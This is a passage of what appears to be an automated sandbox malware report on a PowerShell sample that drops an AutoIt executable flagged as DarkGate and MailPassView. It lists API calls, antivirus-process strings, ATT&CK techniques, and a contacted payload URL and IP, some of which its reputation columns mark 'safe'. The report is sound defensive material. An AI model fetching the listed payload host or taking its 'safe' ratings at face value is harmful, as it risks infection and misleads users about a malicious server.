            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00840030 GetLocalTime,__swprintf,3_2_00840030
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00840722 GetUserNameW,3_2_00840722
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0083416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_0083416A
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00815D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00815D13
            Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: superantispyware.exe

            Stealing of Sensitive Information

            barindex
            Yara detected DarkGate
            Source: Yara matchFile source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
            Yara detected MailPassView
            Source: Yara matchFile source: 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
            Source: Autoit3.exeBinary or memory string: WIN_81
            Source: Autoit3.exeBinary or memory string: WIN_XP
            Source: Autoit3.exeBinary or memory string: WIN_XPe
            Source: Autoit3.exeBinary or memory string: WIN_VISTA
            Source: Autoit3.exeBinary or memory string: WIN_7
            Source: Autoit3.exeBinary or memory string: WIN_8
            Source: Autoit3.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected DarkGate
            Source: Yara matchFile source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0087696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_0087696E
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00876E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00876E32
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CDB420 bind,3_2_03CDB420

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		21
            Input Capture            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API            		1
            Create Account            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Screen Capture            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		2
            Valid Accounts            		2
            Valid Accounts            		2
            Obfuscated Files or Information            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin Shares21
            Input Capture            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            PowerShell            		Login Hook21
            Access Token Manipulation            		1
            Software Packing            		NTDS65
            System Information Discovery            		Distributed Component Object Model4
            Clipboard Data            		13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
            Process Injection            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
            Process Injection            		Network Sniffing1
            System Network Configuration Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            oxi.ps112%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\downloads\Autoit3.exe100%Joe Sandbox ML
            C:\downloads\Autoit3.exe3%ReversingLabs
            C:\downloads\Autoit3.exe4%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/winsvr-2022-pshelpX0%URL Reputationsafe
            https://aka.ms/winsvr-2022-pshelpX0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
            https://kostumn1.ilabsX0%Avira URL Cloudsafe
            http://kostumn1.ilabserver.com0%Avira URL Cloudsafe
            https://kostumn1.ilabserver.com0%Avira URL Cloudsafe
            https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://kostumn1.ilabserver.com/1.zip0%Avira URL Cloudsafe
            http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
            https://kostumn1.ilabserver.com0%VirustotalBrowse
            https://www.autoitscript.com/autoit3/0%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            https://kostumn1.ilabserver.com/1.zip0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kostumn1.ilabserver.com
            		167.235.238.203
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://kostumn1.ilabserver.com/1.zipfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.autoitscript.com/autoit3/JAutoit3.exe, 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp, Autoit3.exe.0.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://kostumn1.ilabserver.compowershell.exe, 00000000.00000002.1778733653.0000024DCBAEC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB14D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: malware
              • URL Reputation: malware
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://go.micropowershell.exe, 00000000.00000002.1778733653.0000024DCBC11000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000000.00000002.1778733653.0000024DCB467000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://kostumn1.ilabsXpowershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://kostumn1.ilabserver.compowershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.autoitscript.com/autoit3/powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              167.235.238.203
              		kostumn1.ilabserver.comUnited States
              		3525ALBERTSONSUSfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1448082
              Start date and time:2024-05-27 18:28:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:oxi.ps1
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winPS1@11/12@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 100
              • Number of non-executed functions: 307
              Cookbook Comments:
              • Found application associated with file extension: .ps1
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 7276 because it is empty
              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              12:28:57API Interceptor45x Sleep call for process: powershell.exe modified
              12:29:01API Interceptor1x Sleep call for process: WMIC.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ALBERTSONSUShttps://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://alsamah.ae/products/&ved=2ahUKEwjF9YHzr6WGAxW4EFkFHSf6BdcQjBB6BAgVEAE&usg=AOvVaw3Td0ZMPQIvFh2L-u6lkLFbGet hashmaliciousUnknownBrowse
              • 167.235.182.180
              http://url2.mailanyone.net/scanner?d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&m=1s6pTH-0000Fr-6D&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0AGet hashmaliciousUnknownBrowse
              • 167.235.115.8
              https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0AGet hashmaliciousUnknownBrowse
              • 167.235.115.8
              https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0AGet hashmaliciousUnknownBrowse
              • 167.235.115.8
              https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0AGet hashmaliciousUnknownBrowse
              • 167.235.115.8
              https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0AGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
              • 167.235.115.8
              https://goo.su/l1bfUYRGet hashmaliciousUnknownBrowse
              • 167.235.33.115
              0Vjz9RSZxz.elfGet hashmaliciousMiraiBrowse
              • 167.234.240.200
              https://usedlpgtank.com/.usaru/asif.hussain@mpft.nhs.ukGet hashmaliciousUnknownBrowse
              • 167.235.115.8
              AudioTranscript_448.htmlGet hashmaliciousHTMLPhisherBrowse
              • 167.235.115.8

